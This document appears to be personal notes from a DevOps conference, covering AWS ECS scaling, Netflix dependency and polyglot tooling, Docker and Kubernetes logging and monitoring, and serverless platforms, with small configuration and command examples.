    • Deployment Configuration
    • Task Placement Strategy

ECS CLI can consume a Docker Compose file and generates a Task Definition from it

Load Balancing

  • Static Port Mapping in the old Loadbalancer (ELB) (Not the best solution for containers)
  • New Loadbalancer (Application Load Balancer (ALB)) - Only HTTP - Define Rules etc.
    • Provides Dynamic Port Mapping

Scaling (Up & Down)

  • CI1
    • T1
    • T2
    • T3

When an alarm happens (In the Task Definition): Scale up

  • CI1
    • T1
    • T2
    • T3
  • CI2
    • T4

AutoScaling: Rule of Thumb

  • Threshold = (1 - max(Container Reservation) / Total Capacity of a single Container Instance) * 100
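Plugged in with illustrative numbers (the largest task reserves 512 MB, instances have 4096 MB of capacity):

```python
# The rule of thumb above as arithmetic: scale out before the reservation
# metric exceeds this percentage, so there is always room left for one more
# of the largest containers on some instance.

def scale_out_threshold(max_container_reservation, instance_capacity):
    """Percentage threshold at which a new container instance is needed."""
    return (1 - max_container_reservation / instance_capacity) * 100

print(scale_out_threshold(512, 4096))  # -> 87.5
```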

One Metric to scale them all

Node Draining

  • Is needed when a new version of the application is available

Best Practices for Continuous Delivery

  • ASG UpdatePolicy: Wait for resource signals
  • cfn-init: Ensure Docker and ECS-Agent is running
  • UserData: Use build number to enforce new EC2 instances

Volumes

  • Not supported or built in :(
  • 2 Options: EBS and EFS
    • EBS - No automatic scaling
    • EFS - Elastic File System - It scales automatically - Pay what you need

Security

  • IAM Security Roles
  • iam.cloudonaut.io

ECS-Agent creates Tasks and talks to them via iptables

  • Tasks shouldn't connect to the Metadata service

What is missing here?

  • Monitoring
  • ...

His wishlist for AWS

  • Support all docker features (i.e. HEALTHCHECK)
  • SecurityGroups for Containers
  • Support volumes natively
  • ...

boards.greenhouse.io/scout24

@pgarbe

20:00 - 20:45 (SAAL MARITIM B/C) - Dependency Hell, Monorepos and beyond

Netflix provides a client.jar for other services

  • So they can reference it in their build.gradle file as a dependency
  • This client.jar has dependencies as well and pulls them in the current service

Netflix uses Artifactory from JFrog

Solutions to the version problem

  • deal with it
  • share nothing or little
  • Monorepo
    • all code in a single repo
    • no versions

Netflix' approach to this problem

  • Astrid - Checks from artifactory which project uses which dependency in which version
  • Niagra - pulls the new version of a jar into all dependent projects and checks whether anything breaks in those projects
    • When a project is OK with the new version, Niagra updates the version of this dependency in the project's VCS and triggers a build pipeline to verify that it works --> then a PR is issued on those projects

@sonofgarr

Wednesday

10:15 - 11:15 - Monitoring and Log Management for Docker, Swarm and Kubernetes

Centralized Log Management - Receive the log in raw format and store it first

  • Where do you store the logs from your application (Log4j etc.)? --> Configure them to write to files / stdout --> Docker changes this, as containers write to stdout and stderr
  • Logformat: Human readable, but we want to have structured data
    • How to get structured data in a human-readable format?
    • Log shippers collect the files
    • Log Parsers use regexps to parse the logs
    • When structured we can put it to ElasticSearch
    • Bulk Indexing with ElasticSearch
  • After Indexing the logs are searchable

Server/Container/App -> Log Shippers -> Centralized Log Management / Logsene

Monitoring

  • similar: even more tools are involved
  • Collect the metrics periodically and ship them to a backend -> Time Series DB

Server + App /Container Configuration -> Monitoring Agents -> Time Series DB -> Dashboard Tools, Alerting Tools, ChatOps Tools

Time Series DB

  • find the minimum value over time

On top of the Time Series DB there are visualization tools

  • e.g. Grafana / Kibana
  • Slack Channels for Alerting

Decision in the first place

  • bound to the Time Series DB

Nice Diagram of "Logging Features" with a lot of tools! Look it up in the slides!!!

Kubernetes

  • Pod - One or multiple Containers
  • 1 Pod with 2 Containers (e.g. Kibana + ElasticSearch) --> Both on the same host (communication via localhost ports) --> ReplicationController: keeps the desired number of pod replicas running
  • Services: Entry Point via the network to the server (similar to exposing port in docker) -> goes over the load balancer
  • AutoScaling
  • CLI Tools for it (easy to setup an ElasticSearch Cluster)
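
The "1 pod, 2 containers" example above could look roughly like this manifest (names and image tags are illustrative); both containers share the pod's network namespace, so Kibana reaches Elasticsearch via localhost:

```yaml
apiVersion: v1
kind: Pod
metadata:
  name: logging-pod            # illustrative
spec:
  containers:
    - name: elasticsearch
      image: elasticsearch:5.4
      ports:
        - containerPort: 9200
    - name: kibana
      image: kibana:5.4
      env:
        - name: ELASTICSEARCH_URL
          value: http://localhost:9200   # same pod -> localhost works
```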

Kubernetes Dashboard / Heapster

  • Real time information
  • Heapster: real time API --> Provides Performance Metrics for every pod and container

docker stack deploy (distributed containers) --> swarm creates an overlay network (can run on different hosts --> this is not possible in Kubernetes)

Kubernetes != Swarm

  • Kubernetes has a steeper learning curve
    • Kubernetes better for larger companies with more teams

Docker Logging

  • Docker Logging Drivers
  • Drivers are set up by Kubernetes
  • From Docker: other Options as a Logging Driver:
    • JournalD, etc...
    • Default: JSON --> works
    • If using syslog as the driver: logs are not saved locally (there is no buffer -> risky: prefer the file driver and forward the files!)
  • docker logs container_id
  • docker logs container_name
  • Syslog Driver:
    • docker run --log-driver=syslog ...
  • Add Context in the docker run command with --log-opt (ImageName, etc.)
  • More fun with TCP logging drivers:
    • docker logs syslog
  • Splunk Logging Driver
  • Alternatives to improve the situation of problematic logging drivers:
    • Logs as JSON
    • When ElasticSearch or the syslog server is not available: have a (smart) agent that buffers the logs (disk buffer)
    • Log Agent - something like logstash
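
The syslog driver and --log-opt bullets above as a concrete command (the syslog address is a placeholder):

```shell
# Route container logs to a remote syslog server instead of the default
# json-file driver, tagging each line with image and container name
docker run --log-driver=syslog \
  --log-opt syslog-address=udp://logs.example.com:514 \
  --log-opt tag="{{.ImageName}}/{{.Name}}" \
  nginx

# Caveat from the talk: with the syslog driver nothing is stored
# locally, so `docker logs <container>` no longer works
```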

Tagging of logs, metrics and events

  • Automatic tagging with:
    • Docker
      • container name
      • image name
      • labels / environments
      • host name + ip (on which node is the container running)
    • kubernetes
      • pod name, UID, namespace
    • Swarm
      • swarm service name, id, compose project, container # scale

Container Metrics Collection

  • docker stats $(docker ps -q)
  • Monitoring agents use these metrics and ship them to the backend

LogRouting: For Teams: Label their containers with an Index

Integrate application monitoring in the stack

  • Service Discovery
    • etcd
    • Consul
    • or API's

Docker --run -> App Container (config to expose metrics) <-- App Monitor <--Automatic Run-- Docker Monitor <--discovery-- Docker

Key Container Metrics

  • Node Storage - Good Docker ops clean up their disks by removing unused containers --> an alarm for disk problems is important
  • Number of containers per host - verify deployment strategies
  • CPU quota per container - when we run more container on one node (limit them)
  • Container memory and OOM counter - tune your app's memory settings to match the container limits (JVM arguments have to match)
  • Docker Events - Network connects, docker pulls (auditing: what happened during the deployment process -> which container was deployed in which version at which time?)
  • Swarm Tasks - (Swarm only) pending tasks

Limit container resources for your apps

  • Set CPU quotas with: --cpu-quota=6000
  • Limit memory and configure the app in the container to the same limits!
  • disable swap: ???some option???
  • ...
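
Putting the flags above together (image name and values are illustrative; the swap option below is an assumption, since the exact flag was not captured in the notes):

```shell
# Limit CPU and memory, and size the JVM heap to fit inside the limit
docker run \
  --cpu-quota=6000 \
  --memory=512m \
  my-java-app \
  java -Xmx400m -jar app.jar
# --memory-swappiness=0 is one candidate for the swap-disabling option
```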

Automatic Deployment of monitoring Agents

  • One command to run a service on each node joining the cluster

Swarm3k - Experiment with Docker Swarm (The community provides nodes to the swarm)

Logs have to be rotated so that the disk doesn't fill up

In Java exposing the JMX interface

Summary

  • Setting up monitoring and logging is complex in dynamic environments!
  • Use smart agents to collect, parse, etc. the logs!

12:00 - 13:00 - DevOps – Dev first, Ops last?

Current State of DevOps

DevOps Pipeline today

  • VCS > CI > CD (Delivery + Deployment) > Production

Book for Unit Testing: "Growing Object-Oriented Software, Guided by Tests"

Pipeline State UFO - A Lamp that indicates the current pipeline state :D

Production

  • Regression Tests

Book: "Building Microservices"

Platform-as-a-Service

  • Kubernetes, ...

Open-Source

  • Logging
    • ELK
  • Call-Tracing
    • AWS X-Ray, Zipkin
  • Monitoring
    • Infrastructure: Nagios
    • For single technologies: java, ...
  • Charting and dashboarding
    • Grafana
    • Kibana

@MartinGoodwell

14:15 - 14:45 - Failure as “Success”: the Mindset, the Methods, and the Landmines

@jpaulreed

15:00 - 16:00 - The State of Serverless

Serverless - like the pipe (|) in Unix

  • (re)volution of the cloud
  • Don't operate on Server level --> We operate on functional level
  • Abstraction of the runtime
  • Costs scale with usage --> never pay for idle
  • No Server/container/process management
  • auto-scale/auto-provision
  • global availability

Abstractions

  1. Bare Metal
  2. IaaS
  3. PaaS
  4. Functions

Function-as-a-Service

  • is event-driven

Backend-as-a-Service

Use cases

  • Data Processing
  • Back-end services / web apps / IoT
  • Infrastructure Automation

Challenges

  • Functions are like microservices but smaller
  • Monitoring + Logging
  • Debugging + Diagnostics
  • Local Development
  • vendor lock-in
  • Latency + Cold start

Providers

  • AWS
  • Azure
  • ...

AWS - Lambda

  • Runtimes
    • Node.js
    • Java
    • Python
    • C#
  • Events
    • ...
  • Monitoring + Logging
    • Logs + Metrics pushed to CloudWatch
    • ...
  • Debugging + Diagnostics
    • X-Ray - Shows us the visual function calls in a graph
  • Local Development
    • No Tool from AWS
    • There is a project on github to do this
  • Ecosystem
    • Step functions
      • Creating workflows - Can be described visually in the UI
      • Coordinate functions

Google Cloud Functions

  • Runtimes
    • Node.js
  • Events
    • HTTP request
    • Cloud Pub/Sub
    • ...
  • Monitoring + Logging
    • Logs and Metrics pushed to Stackdriver Logging
    • ...
  • Debugging + Diagnostics
    • Debugging with Stackdriver Debugger
  • Local Development
    • Cloud Functions Local Emulator
  • Ecosystem
    • Cloud Functions for Firebase

Microsoft Azure

  • Runtimes
    • Node
    • C#
    • ...
  • Events
    • Http Requests
    • Schedule
    • Azure stuff
  • Monitoring + Logging
    • Logs and metrics are pushed to Application Insight
    • ...
  • Debugging + Diagnostics
    • Debugging via local Visual Studio
  • Ecosystem
    • Logic Apps

IBM - Open Source project

  • Runtimes
    • Node.js
    • Swift
    • ...
    • anything via Docker
  • Events
    • HTTP Requests
    • Github events
    • ...

Functions on Kubernetes

  • Kubeless
  • Fission
  • Funktion

FaunaDB

  • DB
  • From the team that scales Twitter
  • global consistency
  • Pay for actual usage

Serverless (company)

  • Offers a CLI
  • A Framework
  • Serverless.yaml file
  • serverless deploy
    • Different Providers
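
A minimal sketch of that workflow (service, function and handler names are made up):

```yaml
# serverless.yml (illustrative)
service: hello-service

provider:
  name: aws
  runtime: nodejs6.10

functions:
  hello:
    handler: handler.hello
    events:
      - http:
          path: hello
          method: get
```

`serverless deploy` then packages the function and provisions it on the configured provider.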

@mthenw

16:30 - 17:30 - The Rise of Polyglot at Netflix

polyglot - multiple languages

Nebula OSPackage - Turns a Java app into a Debian package

Newt - Netflix Workflow Toolkit

  • CLI in Golang
  • newt package
  • `newt setup`
  • .newt.yml

```yaml
app-type: node-beta
build-step: newt exec npm run-script build
tool-versions:
  node: 6.9.1
  npm: 3.10.8
```
  • alias npm="newt exec npm --"